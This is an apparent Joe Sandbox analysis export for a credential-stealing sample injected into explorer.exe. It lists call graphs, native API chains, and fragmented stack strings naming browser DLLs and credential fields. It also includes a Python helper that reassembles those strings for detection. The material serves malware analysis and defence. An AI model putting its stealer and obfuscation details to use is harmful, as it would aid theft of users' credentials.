                                  control_flow_graph 431 80742dd-8074320 call 807f942 434 8074326 431->434 435 80743fa-807440e 431->435 436 8074328-8074339 SleepEx 434->436 436->436 437 807433b-8074341 436->437 438 8074343-8074349 437->438 439 807434b-8074352 437->439 438->439 440 807435c-807436a call 807ef12 438->440 441 8074354-807435a 439->441 442 8074370-8074376 439->442 440->442 441->440 441->442 443 80743b7-80743bd 442->443 444 8074378-807437e 442->444 448 80743d4-80743db 443->448 449 80743bf-80743cf call 8074e72 443->449 444->443 447 8074380-807438a 444->447 447->443 450 807438c-80743b1 call 8075432 447->450 448->436 452 80743e1-80743f5 call 80740f2 448->452 449->448 450->443 452->436
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: b905baf10f82230c4c2cd3705eacdc3d25b2e154953d76354d41c15a8cd070f8
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 42316CB4A04F49DADBA4AF6980892E5B7E2FB54302F44427EC92DCA206CB709055CFD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: 62efb0d7d3a929587e9557f37e8b3a96a30e2a48d18c46eeb0a9c29d3f836ffe
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: BBF0C234668A4D4FD788EF2CD44567AB3D0EBA8215F44063EA58DC3264DA29C582871A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: 0f98a12bb944830b15d74d2d53755b39721b573670788e77127043092c8be377
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 67E15BB0518F488FC7A4EF68C484BAAF7E0FB58300F504A6E959BC7251EF30A541CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 20766bd4207fe10fdbf5b7779c63dc9a87c84ba24a4c13191ce4ceeb5ca265e5
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: EDB17970528B48CEDB95EF68C485AEEB7F1FF98300F50451ED49AC7251EF70A4098B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: 6f2b31c81e86b2875aee41872dc7720e25df88741a14fba2ee157c8183accda9
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: A141B0B0A18B08CFDB14DF98A4467ADBBE2FB48700F00025ED449D7245EBB59D45CBD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: c0902f4de569e5edc72e9a927d32e237016b5c339d64a37da1273715f4920332
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 59C159B0218B09DFC799FF68D885AAAF3E1FB94304F50462E949AC7250DF30E515CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: 21663f17783d2b793963378aaa1edc45455129f0a8ca3129da747b54d0d4e31f
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 5951F3B11187488FD759EF18C8812AAF7E5FB84710F501A2EE8DBC7202DBB4D506CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction ID: 70fa90c7127e65d2c6fc4aa9719d6978a0f6fe9f4b2b9c919203c655eb619fe6
                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction Fuzzy Hash: ADC180B1618A198FC798FF68D455AAAF3E1FB94300F94436D940AC7255EF30EA02C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: e5ed4af21744f0c00bf34739be90bc1336f6545718317500861c8b4e8d6b27a1
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: D4C180B0618A198FC798FF68D455AAAF3E1FB94300F94436D940EC7255EF30EA02C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction ID: 0f35c28eb37a73fb3c4a5aac8024fe37ea1eadeb1947a4fc946dc0f03b9ac82e
                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction Fuzzy Hash: A3A190B06187488BDB59EFA8D444BEEF7E5FF84300F40462DD48AD7251EF7095498786
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction ID: 7a07a07697576d7b96030206f04d5b0bd8aa68a96bae95bff20c5a4cc4b5f05a
                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction Fuzzy Hash: E1918FB06187488BDB59EFA8D444BEEF7E1FB88300F40462ED48AD7251EB7095498786
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction ID: 561040e6b80df43c8c18a83c1a8408c85fd4f8f1579e121b864cf1166a823d30
                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction Fuzzy Hash: A9718F71618A49CFD758EFA8C4847AAF7F1FF58304F00062ED45AD7221EB71E9458B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction ID: fe3ca4265a27af203c985d6ccb729e21de0cdfc8ce9ad9e911ab1120cc5c7f76
                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction Fuzzy Hash: BC514CB0918B4DCBDB94EFA4C045AEAF7E1FF58300F40462E959AE7254EF3095418B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction ID: 427cb4502aa2cf2d6dcd6a5e8059c9a25cfa320d3356962fcf2e993c0eecd23b
                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction Fuzzy Hash: 03418070228B898FCBB5EF6498457EAB7E4FB98301F51462E988EC7240EF30D545C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction ID: 65a45f749fa87b1287451dac5a365123902f4ec55d5e9c2336769634a2097d4f
                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction Fuzzy Hash: EE4151B0A18E5E8FCB94EF6880957ADB7E1FB58300F80456AA80ED7210EA70D540CB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction ID: d0e2b68a6b4e01c548b8fd72342d36a27454ec115a0a355399dcf7862b8b5fe3
                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction Fuzzy Hash: F34195B0618B498FD7A9DF2880853BAFBE1FB98300F50466F949EC3255EB70D545CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction ID: f89c587b5f16922e6e643fd14cc7acb1b1861daa89af9d89896e4110cb5e44c5
                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction Fuzzy Hash: CD31E1B151CB889FC75AEB28C0846EAF7D0FB84300F50491EE49BC7251EE30A549CB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction ID: efc3834026e7c1abf1561f18c0a81073189f9574d05ea52bc8a0530a29a1abb5
                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction Fuzzy Hash: 7331F2B1518B48AFD75AEB28C4856EAF7D4FB94300F50491EE49BC3251EE30E54ACB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction ID: 8decc4b8be04426d3e9dec53e2e9b6f5cab7526c51ab0703bda010e7afa25863
                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction Fuzzy Hash: 68315CB0118B498FCB94FF688495BAAB6E1FB98300F94066D944ACB255DF30C945C763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction ID: 7831264859a44d9ef4c3cf8aa7a61a5b073056e52efdfc5cb71a3ba57fef965b
                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction Fuzzy Hash: A5318DB0218B498FCB94FF688494BAAB7E1FF98300F94062D944ACB255DF30C945C763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: 23259cbb800ddb492605ed06a023ae549207f0f96fe7598a715cb00300e05113
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: 1131D171614A4D8BCB45FFA8C8847EDB7E1FB58214F40022AD45EE7240DE748645C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 6dfdfd5d0b280af436150956f18fb81638a72291d93be864d5f0606ef14fc6c5
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 1C21C3B0614A4D8ACB45FFA8C8447EDBBE1FF58204F40421AD45AE7240DE7486458796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction ID: 4a4064ba28c43e01746f1824ded5e04178198d2e01e4246d934d5847cfa2ee7b
                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction Fuzzy Hash: 0F216BB0A24B0D9FDB44FFA8C0447ADFAF0FB58314F90462ED009D3600DB7495918B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction ID: f9680b5633b3977cf92352fd2b0c2bc29b7303416978f5686ff56d2b2555ee58
                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction Fuzzy Hash: 5A2148B4A24A0D9FDB48FFA8D044BE9FAF1FB58314F90462ED049E3600DB7895918B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction ID: 4a3ef813d42f9d7720e1d98515cab07fe0a01af6803147014fb32db4f4b16de1
                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction Fuzzy Hash: D521D2B0624B0D8BCB45EF9D98807EEB7F1EF88344F005619D40AEB244D7B4E9148BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%
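The String ID fields in the entries above list each function's string constants as short pieces separated by '$' (for example 'kern', 'el32', '.dll'). Nearly all pieces are four characters or fewer, which is what string constants look like when code assembles them on the stack from 32-bit immediates instead of referencing a literal in a data section, and the pieces appear deduplicated and unordered, so a name can only be recovered by testing whether a candidate can be tiled from the pieces. The following is an added example, not part of the Joe Sandbox report or of the sample's code, that performs that tiling with a word-break dynamic programme over a list of candidate strings; the fragment lists are copied from the String ID fields above (the single-character lists are left out) and the candidate list TARGETS is an assumption.

```python
"""Reassemble fragmented string constants from Joe Sandbox 'String ID' fields.

Added example, not part of the Joe Sandbox report. The fragment lists below
are copied from the report's String ID fields; TARGETS is an assumed list of
candidate strings used to guide the reassembly.
"""
from typing import Dict, List, Optional, Tuple

# Constructed input: the multi-character String ID fields copied from the report.
STRING_ID_FIELDS = [
    "4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi",
    "UR$2$L: $Pass$User$name$word",
    "2.dl$dll$l32.$ole3$shel",
    "4$\\$dll$ion.$vers",
    "32.d$cli.$dll$sspi$user",
    ".dll$el32$h$kern",
    "$Snif$f fr$om:",
    ".dll$chro$hild$me_c",
    "User-Agent: $nt: $on.d$urlmon.dll",
    "auth$logi$pass$user",
]

# Assumed candidate strings (library names and credential-harvesting labels)
# that the pieces are tested against; extend the list as needed.
TARGETS = [
    "kernel32.dll", "user32.dll", "shell32.dll", "ole32.dll", "version.dll",
    "sspicli.dll", "urlmon.dll", "chrome_child.dll", "opera_browser.dll",
    "dragon_s.dll", "nspr4.dll", "Username", "Password", "URL: ",
    "Sniff from:", "User-Agent: ", "login", "auth", "pass", "user",
]


def split_field(field: str) -> List[str]:
    """Split a String ID field on its '$' separator, dropping empty pieces."""
    return [p for p in field.split("$") if p]


def tile(target: str, pieces: List[str]) -> Optional[List[str]]:
    """Return pieces, in order, whose concatenation is exactly target, or None.

    Pieces may be reused, because the report lists each distinct immediate
    once per function. A left-to-right reachability table (the classic
    word-break dynamic programme) keeps this O(len(target) * len(pieces)).
    """
    n = len(target)
    parent: List[Optional[Tuple[int, str]]] = [None] * (n + 1)
    reach = [False] * (n + 1)
    reach[0] = True
    for i in range(n):
        if not reach[i]:
            continue
        for p in pieces:
            j = i + len(p)
            if j <= n and not reach[j] and target.startswith(p, i):
                reach[j] = True
                parent[j] = (i, p)
    if not reach[n]:
        return None
    out: List[str] = []
    j = n
    while j > 0:
        i, p = parent[j]  # type: ignore[misc]
        out.append(p)
        j = i
    return out[::-1]


def recover(field: str, targets: List[str]) -> Dict[str, List[str]]:
    """Map every target that can be tiled from this field to its tiling."""
    pieces = split_field(field)
    found: Dict[str, List[str]] = {}
    for t in targets:
        tiling = tile(t, pieces)
        if tiling is not None:
            found[t] = tiling
    return found


def recover_all(fields: List[str], targets: List[str]) -> Dict[str, Dict[str, List[str]]]:
    """Run recover() over every field; keys are the original field strings."""
    return {f: recover(f, targets) for f in fields}


def short_fragment_ratio(fields: List[str], limit: int = 4) -> float:
    """Share of pieces no longer than `limit` chars (evidence of imm32 stack strings)."""
    pieces = [p for f in fields for p in split_field(f)]
    return sum(len(p) <= limit for p in pieces) / len(pieces)


if __name__ == "__main__":
    print(f"pieces of <= 4 chars: {short_fragment_ratio(STRING_ID_FIELDS):.0%}")
    for field, found in recover_all(STRING_ID_FIELDS, TARGETS).items():
        for name, parts in found.items():
            print(f"{name:<18} <- {' + '.join(repr(p) for p in parts):<36} [{field}]")
```

Not every name reassembles: 'ole32.dll' and 'user32.dll' each lack their final piece in the field they come from, so tile() returns None for them rather than guessing, which is the behaviour you want when the result feeds a detection rule.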

                                  Execution Graph

                                  Execution Coverage: 2%
                                  Dynamic/Decrypted Code Coverage: 1.7%
                                  Signature Coverage: 0%
                                  Total number of Nodes: 589
                                  Total number of Limit Nodes: 75
                                  execution_graph: rendered call-graph figure; the node and edge listing is not reproduced here. It begins at node 81676 (200f900 LdrInitializeThunk) and is cut off at node 82133 (daf20 LdrLoadDll). Native API names attached to nodes in the listing: LdrInitializeThunk, LdrLoadDll, NtAllocateVirtualMemory, NtClose, NtCreateFile, NtReadFile, RtlAllocateHeap, RtlFreeHeap. Most nodes reach the native API through a wrapper at daf20 (LdrLoadDll); the file-handling nodes pair da320 (NtCreateFile), da3d0 (NtReadFile) and da450 (NtClose), and the chain starting at dad30 calls dabf0 (LdrLoadDll) repeatedly, about forty consecutive calls.
82132->82133 82134 da59c 82133->82134 82137 200fb68 LdrInitializeThunk 82134->82137 82135 da5b3 82135->82125 82137->82135 82139 db583 82138->82139 82142 cace0 82139->82142 82141 c9c4b 82141->81756 82144 cad04 82142->82144 82143 cad0b 82143->82141 82144->82143 82145 cad57 82144->82145 82146 cad40 LdrLoadDll 82144->82146 82145->82141 82146->82145 82148 cb053 82147->82148 82149 cb0d0 82148->82149 82162 d9c50 LdrLoadDll 82148->82162 82149->81761 82152 daf20 LdrLoadDll 82151->82152 82153 cf1ab 82152->82153 82153->81769 82154 da790 82153->82154 82155 da7af LookupPrivilegeValueW 82154->82155 82156 daf20 LdrLoadDll 82154->82156 82155->81765 82156->82155 82158 daf20 LdrLoadDll 82157->82158 82159 da23c 82158->82159 82163 200fed0 LdrInitializeThunk 82159->82163 82160 da25b 82160->81768 82162->82149 82163->82160 82165 cb1e0 82164->82165 82166 cb030 LdrLoadDll 82165->82166 82167 cb1f4 82166->82167 82167->81701 82169 caf24 82168->82169 82241 d9c50 LdrLoadDll 82169->82241 82171 caf5e 82171->81703 82173 cf39c 82172->82173 82174 cb1b0 LdrLoadDll 82173->82174 82175 cf3ae 82174->82175 82242 cf280 82175->82242 82178 cf3c9 82180 cf3d4 82178->82180 82182 da450 2 API calls 82178->82182 82179 cf3e1 82181 cf3f2 82179->82181 82183 da450 2 API calls 82179->82183 82180->81706 82181->81706 82182->82180 82183->82181 82185 cf42c 82184->82185 82262 cb2a0 82185->82262 82187 